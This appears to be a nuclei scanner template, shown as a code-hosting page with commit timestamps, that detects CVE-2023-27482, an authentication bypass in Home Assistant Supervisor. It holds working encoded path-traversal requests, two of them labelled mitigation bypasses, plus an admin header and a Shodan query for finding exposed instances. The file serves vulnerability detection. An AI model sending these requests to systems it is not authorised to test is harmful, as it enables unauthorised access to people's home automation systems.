nuclei-templates/http/cves/2023/CVE-2023-27482.yaml

65 lines
2.7 KiB
YAML
Raw Normal View History

id: CVE-2023-27482
info:
2023-06-01 08:49:59 +00:00
name: Home Assistant Supervisor - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.
reference:
- https://www.elttam.com/blog/pwnassistant/
- https://github.com/elttam/publications/blob/master/writeups/home-assistant/supervisor-authentication-bypass-advisory.md
- https://www.home-assistant.io/blog/2023/03/08/supervisor-security-disclosure/
- https://nvd.nist.gov/vuln/detail/CVE-2023-27482
- https://github.com/home-assistant/core/security/advisories/GHSA-2j8f-h4mr-qr25
- https://xz.aliyun.com/t/12572
2023-07-11 19:49:27 +00:00
remediation: |
The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-07-11 19:49:27 +00:00
cvss-score: 10
cve-id: CVE-2023-27482
cwe-id: CWE-287
2023-07-11 19:49:27 +00:00
epss-score: 0.03052
cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:*
metadata:
max-request: 3
2023-06-04 08:13:42 +00:00
verified: true
shodan-query: title:"Home Assistant"
2023-07-11 19:49:27 +00:00
vendor: home-assistant
product: home-assistant
tags: cve,cve2023,homeassistant,auth-bypass,rce
http:
- raw:
- |
GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1
Host: {{Hostname}}
- |
GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1
Host: {{Hostname}}
- |
GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2
Host: {{Hostname}}
X-Hass-Is-Admin:1
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: word
words:
- '"slug":'
- '"name":'
- '"ip_address"'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200